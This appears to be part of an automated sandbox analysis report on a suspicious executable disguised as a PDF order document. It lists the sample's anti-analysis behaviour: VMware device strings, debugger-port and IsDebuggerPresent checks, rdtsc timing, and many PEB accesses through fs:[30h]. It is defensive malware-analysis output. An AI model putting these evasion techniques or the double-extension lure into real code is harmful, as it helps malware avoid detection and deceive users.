Source: explorer.exe, 00000006.00000000.2113534114.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2109047338.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Code function: 4_2_00409AA0 rdtsc

4_2_00409AA0

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Code function: 4_2_0040ACE0 LdrLoadDll,

4_2_0040ACE0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_00A025B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

8_2_00A025B2

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EA118 mov ecx, dword ptr fs:[00000030h]	4_2_011EA118
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EA118 mov eax, dword ptr fs:[00000030h]	4_2_011EA118
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EA118 mov eax, dword ptr fs:[00000030h]	4_2_011EA118
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EA118 mov eax, dword ptr fs:[00000030h]	4_2_011EA118
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]	4_2_011EE10E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01170124 mov eax, dword ptr fs:[00000030h]	4_2_01170124
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01200115 mov eax, dword ptr fs:[00000030h]	4_2_01200115
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146154 mov eax, dword ptr fs:[00000030h]	4_2_01146154
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146154 mov eax, dword ptr fs:[00000030h]	4_2_01146154
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113C156 mov eax, dword ptr fs:[00000030h]	4_2_0113C156
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D8158 mov eax, dword ptr fs:[00000030h]	4_2_011D8158
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]	4_2_011D4144
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]	4_2_011D4144
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D4144 mov ecx, dword ptr fs:[00000030h]	4_2_011D4144
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]	4_2_011D4144
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]	4_2_011D4144
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]	4_2_011C019F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]	4_2_011C019F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]	4_2_011C019F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]	4_2_011C019F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113A197 mov eax, dword ptr fs:[00000030h]	4_2_0113A197
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113A197 mov eax, dword ptr fs:[00000030h]	4_2_0113A197
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113A197 mov eax, dword ptr fs:[00000030h]	4_2_0113A197
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FC188 mov eax, dword ptr fs:[00000030h]	4_2_011FC188
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FC188 mov eax, dword ptr fs:[00000030h]	4_2_011FC188
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01180185 mov eax, dword ptr fs:[00000030h]	4_2_01180185
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E4180 mov eax, dword ptr fs:[00000030h]	4_2_011E4180
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E4180 mov eax, dword ptr fs:[00000030h]	4_2_011E4180
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012161E5 mov eax, dword ptr fs:[00000030h]	4_2_012161E5
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]	4_2_011BE1D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]	4_2_011BE1D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE1D0 mov ecx, dword ptr fs:[00000030h]	4_2_011BE1D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]	4_2_011BE1D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]	4_2_011BE1D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012061C3 mov eax, dword ptr fs:[00000030h]	4_2_012061C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012061C3 mov eax, dword ptr fs:[00000030h]	4_2_012061C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011701F8 mov eax, dword ptr fs:[00000030h]	4_2_011701F8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]	4_2_0115E016
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]	4_2_0115E016
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]	4_2_0115E016
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]	4_2_0115E016
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C4000 mov ecx, dword ptr fs:[00000030h]	4_2_011C4000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]	4_2_011E2000
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D6030 mov eax, dword ptr fs:[00000030h]	4_2_011D6030
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113A020 mov eax, dword ptr fs:[00000030h]	4_2_0113A020
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113C020 mov eax, dword ptr fs:[00000030h]	4_2_0113C020
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01142050 mov eax, dword ptr fs:[00000030h]	4_2_01142050
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6050 mov eax, dword ptr fs:[00000030h]	4_2_011C6050
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116C073 mov eax, dword ptr fs:[00000030h]	4_2_0116C073
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012060B8 mov eax, dword ptr fs:[00000030h]	4_2_012060B8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012060B8 mov ecx, dword ptr fs:[00000030h]	4_2_012060B8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114208A mov eax, dword ptr fs:[00000030h]	4_2_0114208A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D80A8 mov eax, dword ptr fs:[00000030h]	4_2_011D80A8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C20DE mov eax, dword ptr fs:[00000030h]	4_2_011C20DE
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113C0F0 mov eax, dword ptr fs:[00000030h]	4_2_0113C0F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011820F0 mov ecx, dword ptr fs:[00000030h]	4_2_011820F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113A0E3 mov ecx, dword ptr fs:[00000030h]	4_2_0113A0E3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C60E0 mov eax, dword ptr fs:[00000030h]	4_2_011C60E0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011480E9 mov eax, dword ptr fs:[00000030h]	4_2_011480E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113C310 mov ecx, dword ptr fs:[00000030h]	4_2_0113C310
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01160310 mov ecx, dword ptr fs:[00000030h]	4_2_01160310
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A30B mov eax, dword ptr fs:[00000030h]	4_2_0117A30B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A30B mov eax, dword ptr fs:[00000030h]	4_2_0117A30B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A30B mov eax, dword ptr fs:[00000030h]	4_2_0117A30B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]	4_2_011C035C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]	4_2_011C035C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]	4_2_011C035C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C035C mov ecx, dword ptr fs:[00000030h]	4_2_011C035C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]	4_2_011C035C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]	4_2_011C035C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E8350 mov ecx, dword ptr fs:[00000030h]	4_2_011E8350
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]	4_2_011C2349
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E437C mov eax, dword ptr fs:[00000030h]	4_2_011E437C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120A352 mov eax, dword ptr fs:[00000030h]	4_2_0120A352
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01138397 mov eax, dword ptr fs:[00000030h]	4_2_01138397
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01138397 mov eax, dword ptr fs:[00000030h]	4_2_01138397
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01138397 mov eax, dword ptr fs:[00000030h]	4_2_01138397
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116438F mov eax, dword ptr fs:[00000030h]	4_2_0116438F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116438F mov eax, dword ptr fs:[00000030h]	4_2_0116438F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113E388 mov eax, dword ptr fs:[00000030h]	4_2_0113E388
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113E388 mov eax, dword ptr fs:[00000030h]	4_2_0113E388
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113E388 mov eax, dword ptr fs:[00000030h]	4_2_0113E388
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE3DB mov eax, dword ptr fs:[00000030h]	4_2_011EE3DB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE3DB mov eax, dword ptr fs:[00000030h]	4_2_011EE3DB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE3DB mov ecx, dword ptr fs:[00000030h]	4_2_011EE3DB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EE3DB mov eax, dword ptr fs:[00000030h]	4_2_011EE3DB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E43D4 mov eax, dword ptr fs:[00000030h]	4_2_011E43D4
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E43D4 mov eax, dword ptr fs:[00000030h]	4_2_011E43D4
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FC3CD mov eax, dword ptr fs:[00000030h]	4_2_011FC3CD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0114A3C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0114A3C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0114A3C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0114A3C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0114A3C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0114A3C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]	4_2_011483C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]	4_2_011483C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]	4_2_011483C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011483C0 mov eax, dword ptr fs:[00000030h]	4_2_011483C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C63C0 mov eax, dword ptr fs:[00000030h]	4_2_011C63C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0115E3F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0115E3F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0115E3F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011763FF mov eax, dword ptr fs:[00000030h]	4_2_011763FF
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011503E9 mov eax, dword ptr fs:[00000030h]	4_2_011503E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113823B mov eax, dword ptr fs:[00000030h]	4_2_0113823B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113A250 mov eax, dword ptr fs:[00000030h]	4_2_0113A250
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01146259 mov eax, dword ptr fs:[00000030h]	4_2_01146259
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FA250 mov eax, dword ptr fs:[00000030h]	4_2_011FA250
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FA250 mov eax, dword ptr fs:[00000030h]	4_2_011FA250
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C8243 mov eax, dword ptr fs:[00000030h]	4_2_011C8243
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C8243 mov ecx, dword ptr fs:[00000030h]	4_2_011C8243
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0274 mov eax, dword ptr fs:[00000030h]	4_2_011F0274
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144260 mov eax, dword ptr fs:[00000030h]	4_2_01144260
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144260 mov eax, dword ptr fs:[00000030h]	4_2_01144260
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144260 mov eax, dword ptr fs:[00000030h]	4_2_01144260
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113826B mov eax, dword ptr fs:[00000030h]	4_2_0113826B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E284 mov eax, dword ptr fs:[00000030h]	4_2_0117E284
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E284 mov eax, dword ptr fs:[00000030h]	4_2_0117E284
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C0283 mov eax, dword ptr fs:[00000030h]	4_2_011C0283
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C0283 mov eax, dword ptr fs:[00000030h]	4_2_011C0283
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C0283 mov eax, dword ptr fs:[00000030h]	4_2_011C0283
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011502A0 mov eax, dword ptr fs:[00000030h]	4_2_011502A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011502A0 mov eax, dword ptr fs:[00000030h]	4_2_011502A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]	4_2_011D62A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D62A0 mov ecx, dword ptr fs:[00000030h]	4_2_011D62A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]	4_2_011D62A0
